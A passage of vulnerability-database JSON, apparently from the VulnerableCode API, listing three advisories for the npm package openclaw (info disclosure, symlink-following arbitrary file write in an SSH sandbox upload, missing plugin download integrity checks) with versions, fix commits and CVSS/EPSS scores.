ilities/89511?format=json","vulnerability_id":"VCID-c76v-4577-n7c6","summary":"OpenClaw Has a Gateway Control Interface Information Disclosure Vulnerability\n## Summary\nOpenClaw Gateway Control Interface Information Disclosure Vulnerability\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Released Control UI bootstrap JSON did expose version and assistant agent id, but that is low-severity fingerprinting or info disclosure only; unreleased c5c10adc trims the payload.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c5c10adc022f42eb75ebb3bf364dd607738683b3` — 2026-03-30T15:08:19+01:00\n\nOpenClaw thanks @topsec-bunney for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41335","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12878","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12844","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12883","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41335"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c5c10adc022f42eb75ebb3bf364dd607738683b3"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hr8g-2q7x-3f4w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41335","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41335"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:32:59Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-control-ui-bootstrap-json"},{"reference_url":"https://github.com/advisories/GHSA-hr8g-2q7x-3f4w","reference_id":"GHSA-hr8g-2q7x-3f4w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hr8g-2q7x-3f4w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41335","GHSA-hr8g-2q7x-3f4w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c76v-4577-n7c6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89380?format=json","vulnerability_id":"VCID-carm-gpgh-wbbf","summary":"OpenClaw: SSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n## Summary\nSSH sandbox tar upload follows symlinks, enabling arbitrary file write on remote host\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28: SSH sandbox tar upload lacked pre-upload symlink escape rejection until 3d5af14984 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3d5af14984ac1976c747a8e11581d697bd0829dc` — 2026-03-31T19:56:45+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41364","reference_id":"","reference_type":"","scores":[{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40948","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40921","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00191","scoring_system":"epss","scoring_elements":"0.40952","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41364"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3d5af14984ac1976c747a8e11581d697bd0829dc"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fv94-qvg8-xqpw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41364","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41364"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:05:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-symlink-following-in-ssh-sandbox-tar-upload"},{"reference_url":"https://github.com/advisories/GHSA-fv94-qvg8-xqpw","reference_id":"GHSA-fv94-qvg8-xqpw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fv94-qvg8-xqpw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41364","GHSA-fv94-qvg8-xqpw"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-carm-gpgh-wbbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89367?format=json","vulnerability_id":"VCID-cbuu-4d6c-rben","summary":"OpenClaw B-M3: ClawHub package downloads are not enforced with integrity verification\n## Impact\n\nB-M3: ClawHub package downloads are not enforced with integrity verification.\n\nClawHub downloads could install plugin archives without enforcing archive or per-file integrity metadata.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42428","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.059","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05897","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05906","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42428"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42428","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42428"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:14:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads"},{"reference_url":"https://github.com/advisories/GHSA-3vvq-q2qc-7rmp","reference_id":"GHSA-3vvq-q2qc-7rmp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3vvq-q2qc-7rmp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerab